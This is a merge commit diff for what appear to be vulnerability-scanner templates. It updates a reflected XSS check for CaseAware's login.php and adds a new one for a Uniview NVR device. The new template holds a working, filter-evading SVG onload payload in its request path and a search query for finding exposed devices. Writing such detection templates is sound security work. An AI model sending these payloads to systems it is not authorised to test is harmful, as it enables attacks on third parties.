Merge pull request #10611 from r3naissance/main

Adding CVE-2024-3850 and updating payload to match response match in CVE-2024-25669

http/cves/2024/CVE-2024-25669.yaml

@@ -5,9 +5,9 @@ info:
   author: r3naissance
   severity: medium
   description: |
-    a360inc CaseAware contains a reflected cross-site scripting vulnerability via the user parameter transmitted in the login.php query string. This is a bypass of the fix reported in CVE-2017->
+    a360inc CaseAware contains a reflected cross-site scripting vulnerability via the user parameter transmitted in the login.php query string. This is a bypass of the fix reported in 2017
   impact: |
-    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of t>
+    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement
   remediation: |
     To remediate this vulnerability, it is recommended to apply the latest patches or updates provided by the vendor.
   reference:
@@ -40,7 +40,7 @@ http:
       - type: word
         part: body
         words:
-          - "value='test' draggable=true ondrag=alert(1)"
+          - "value='test' draggable=true ondrag=alert(document.domain)"
           - "CaseAware"
         condition: and
 
@@ -52,4 +52,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022100a6a58d9146204ae0ffb0ab57b75f31c8cc8a2904197b3012eea9461123594e2c02200233a9dfb0f2290cadf406d7908d4f86522a9344cf74429dfbab394d62a05d8c:922c64590222798bb761d5b6d8e72950
+# digest: 4a0a00473045022100a6a58d9146204ae0ffb0ab57b75f31c8cc8a2904197b3012eea9461123594e2c02200233a9dfb0f2290cadf406d7908d4f86522a9344cf74429dfbab394d62a05d8c:922c64590222798bb761d5b6d8e72950

http/cves/2024/CVE-2024-3850.yaml

@@ -0,0 +1,50 @@
+id: CVE-2024-3850
+
+info:
+  name: Uniview NVR301-04S2-P4 - Cross-Site Scripting
+  author: Bleron Rrustemi,r3naissance
+  severity: medium
+  description: |
+    Uniview NVR301-04S2-P4 contains a reflected cross-site scripting vulnerability via the PATH of LAPI. CISA and Uniview state that this vulnerability needs to be authenticated. This is incorrect. Any PATH payload can cause XSS. A submission to Mitre has been sent to update the verbiage in the finding as well as the CVSS score.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement.
+  remediation: |
+    To fix this vulnerability, it is recommended to apply the latest patches or updates provided by the vendor.
+  reference:
+    - https://global.uniview.com/About_Us/Security/Notice/202406/992932_140493_0.htm
+    - https://nvd.nist.gov/vuln/detail/CVE-2024-3850
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 5.4
+    cve-id: CVE-2024-3850
+    cwe-id: CWE-79
+    cpe: cpe:2.3:h:uniview:nvr301-04s2-p4:-:*:*:*:*:*:*:*
+  metadata:
+    verified: true
+    max-request: 1
+    vendor: Uniview
+    product: NVR301-04S2-P4
+    fofa-query: title="NVR301-04-P4"
+  tags: cve,cve2024,xss,uniview,nvr
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/V1.0%3CsVg/onload=alert.bind%28%29%281%29%3E/Alarm/Exceptions/LinkageActions?="
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "/V1.0<sVg/onload=alert.bind()(1)>/Alarm/Exceptions/LinkageActions?="
+        condition: and
+
+      - type: word
+        part: header
+        words:
+          - NVRDVR
+
+      - type: status
+        status:
+          - 200